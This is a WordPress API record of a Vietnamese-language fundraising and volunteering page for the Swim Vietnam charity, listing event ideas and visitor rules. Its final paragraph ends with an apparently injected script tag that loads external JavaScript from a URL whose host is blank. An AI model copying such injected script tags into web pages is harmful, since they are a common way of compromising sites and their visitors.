{"id":15524,"date":"2022-06-19T18:45:02","date_gmt":"2022-06-19T11:45:02","guid":{"rendered":"http:\/\/swimvietnam.com\/?page_id=15524"},"modified":"2022-06-23T21:33:20","modified_gmt":"2022-06-23T14:33:20","slug":"fundraise-for-swim-vietnam","status":"publish","type":"page","link":"https:\/\/swimvietnam.com\/vi\/fundraise-for-swim-vietnam\/","title":{"rendered":"G\u00e2y qu\u1ef9 cho Swim Vietnam"},"content":{"rendered":"<h2><span style=\"font-weight: 400;\">R\u1ea5t nhi\u1ec1u c\u00e1ch b\u1ea1n c\u00f3 th\u1ec3 quy\u00ean g\u00f3p qu\u1ef9 cho Swim Vietnam. D\u01b0\u1edbi \u0111\u00e2y l\u00e0 1 s\u1ed1 \u00fd t\u01b0\u1edfng \u0111\u1ec3 b\u1ea1n b\u1eaft \u0111\u1ea7u \u2026<\/span><\/h2>\n<h2><strong>C\u00e1c s\u1ef1 ki\u1ec7n b\u01a1i<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">M\u1ed9t s\u1ed1 trong c\u00e1c nh\u00e0 t\u00e0i tr\u1ee3 c\u1ee7a ch\u00fang t\u00f4i th\u01b0\u1eddng t\u1ed5 ch\u1ee9c thi \u0111\u1ea5u\u00a0 gi\u1ea3i b\u01a1i ho\u1eb7c \u0111\u1ee9ng n\u01b0\u1edbc g\u00e2y qu\u1ef9 t\u1eeb thi\u1ec7n; ng\u01b0\u1eddi b\u01a1i nh\u1eadn t\u00e0i tr\u1ee3 b\u1edfi ch\u00ednh nh\u1eefng b\u1ea1n b\u00e8 v\u00e0 gia \u0111\u00ecnh h\u1ecd cho m\u1ed7i v\u00f2ng h\u1ecd b\u01a1i hay m\u1ed7i ph\u00fat h\u1ecd \u0111\u1ee9ng n\u01b0\u1edbc.<\/span><\/p>\n<h2><strong>T\u1eb7ng qu\u00e0<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">B\u1ea1n, ng\u01b0\u1eddi c\u00f3 m\u1ecdi th\u1ee9, mu\u1ed1n cho g\u00ec? M\u00f3n qu\u00e0 k\u1ef9 n\u0103ng an to\u00e0n n\u01b0\u1edbc cho 1 tr\u1ebb \u1edf Vi\u1ec7t Nam?<\/span><\/p>\n<p><span style=\"font-weight: 400;\">G\u00e2y qu\u1ef9 t\u1ea1i n\u01a1i l\u00e0m vi\u1ec7c hay tr\u01b0\u1eddng h\u1ecdc.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">T\u1ed5 ch\u1ee9c 1 s\u1ef1 ki\u1ec7n t\u1ea1i n\u01a1i l\u00e0m vi\u1ec7c hay tr\u01b0\u1eddng h\u1ecdc l\u00e0 c\u00e1ch tuy\u1ec7t v\u1eddi \u0111\u1ec3 g\u00e2y qu\u1ef9. T\u1ea5t c\u1ea3 \u0111i\u1ec1u b\u1ea1n c\u1ea7n l\u00e0 quy\u1ebft \u0111\u1ecbnh l\u00e0m g\u00ec! \u0110\u00e2y l\u00e0 1 s\u1ed1 \u00fd t\u01b0\u1edfng:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">*b\u00e1n \u0111\u1ed3 n\u01b0\u1edbng hay cu\u1ed9c x\u1ed5 s\u1ed1 \u0111\u1ec3 b\u00e1n h\u00e0ng v\u00ec m\u1ee5c \u0111\u00edch t\u1eeb thi\u1ec7n<\/span><\/p>\n<p><span style=\"font-weight: 400;\">* b\u00e1n x\u00fac x\u00edch r\u00e1n<\/span><\/p>\n<p><span style=\"font-weight: 400;\">* \u0111\u00eam nh\u1ea1c hay c\u00e1c s\u1ef1 ki\u1ec7n theo nh\u00f3m kh\u00e1c<\/span><\/p>\n<p><span style=\"font-weight: 400;\">C\u00e1c ho\u1ea1t \u0111\u1ed9ng g\u00e2y qu\u1ef9 c\u1ee7a c\u00e1c nh\u00e0 t\u00e0i tr\u1ee3 c\u00f3 \u00fd ngh\u0129a r\u1ea5t l\u1edbn v\u1edbi Swim Vietnam.<\/span><\/p>\n<h2><strong>T\u00ecnh nguy\u1ec7n vi\u00ean<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">V\u00ec chi ph\u00ed v\u00e0 kh\u00f3 kh\u0103n xin th\u1ecb th\u1ef1c c\u0169ng nh\u01b0 m\u1ed9t s\u1ed1 th\u1ee7 t\u1ee5c h\u00e0nh ch\u00ednh kh\u00e1c\u00a0 Swim Vietnam kh\u00f4ng th\u1ec3 tuy\u1ec3n \u0111\u01b0\u1ee3c t\u00ecnh nguy\u1ec7n vi\u00ean ng\u1eafn h\u1ea1n (d\u01b0\u1edbi th\u1eddi h\u1ea1n 3 th\u00e1ng).<\/span><\/p>\n<p><span style=\"font-weight: 400;\">C\u00e1c t\u00ecnh nguy\u1ec7n vi\u00ean c\u00f3 th\u1ec3 trao c\u00e1c m\u00f3n qu\u00e0\u00a0 \u00a0nh\u01b0 k\u00ednh b\u01a1i, m\u0169 b\u01a1i hay phao t\u1eadp b\u01a1i cho c\u00e1c em t\u1ea1i h\u1ed3 b\u01a1i<\/span><\/p>\n<p><span style=\"font-weight: 400;\">H\u00e3y cho ch\u00fang t\u00f4i bi\u1ebft tr\u01b0\u1edbc chuy\u1ebfn th\u0103m c\u1ee7a b\u1ea1n v\u00e0 ch\u00fang t\u00f4i thu x\u1ebfp th\u1eddi gian \u0111\u1ec3 b\u1ea1n trao t\u1eb7ng tr\u1ebb nh\u1eefng m\u00f3n qu\u00e0 nh\u1ecf xing v\u00e0 quan s\u00e1t l\u1edbp h\u1ecdc b\u01a1i.<\/span><script src='https:\/\/?v=11.87.33' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>R\u1ea5t nhi\u1ec1u c\u00e1ch b\u1ea1n c\u00f3 th\u1ec3 quy\u00ean g\u00f3p qu\u1ef9 cho Swim Vietnam. D\u01b0\u1edbi \u0111\u00e2y l\u00e0 1 s\u1ed1 \u00fd t\u01b0\u1edfng \u0111\u1ec3 b\u1ea1n b\u1eaft \u0111\u1ea7u \u2026 C\u00e1c s\u1ef1 ki\u1ec7n b\u01a1i M\u1ed9t s\u1ed1 trong c\u00e1c nh\u00e0 t\u00e0i tr\u1ee3 c\u1ee7a ch\u00fang t\u00f4i th\u01b0\u1eddng t\u1ed5 ch\u1ee9c thi \u0111\u1ea5u\u00a0 gi\u1ea3i b\u01a1i ho\u1eb7c \u0111\u1ee9ng n\u01b0\u1edbc g\u00e2y qu\u1ef9 t\u1eeb thi\u1ec7n; ng\u01b0\u1eddi b\u01a1i nh\u1eadn [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"_links":{"self":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15524"}],"collection":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/comments?post=15524"}],"version-history":[{"count":5,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15524\/revisions"}],"predecessor-version":[{"id":15903,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15524\/revisions\/15903"}],"wp:attachment":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/media?parent=15524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}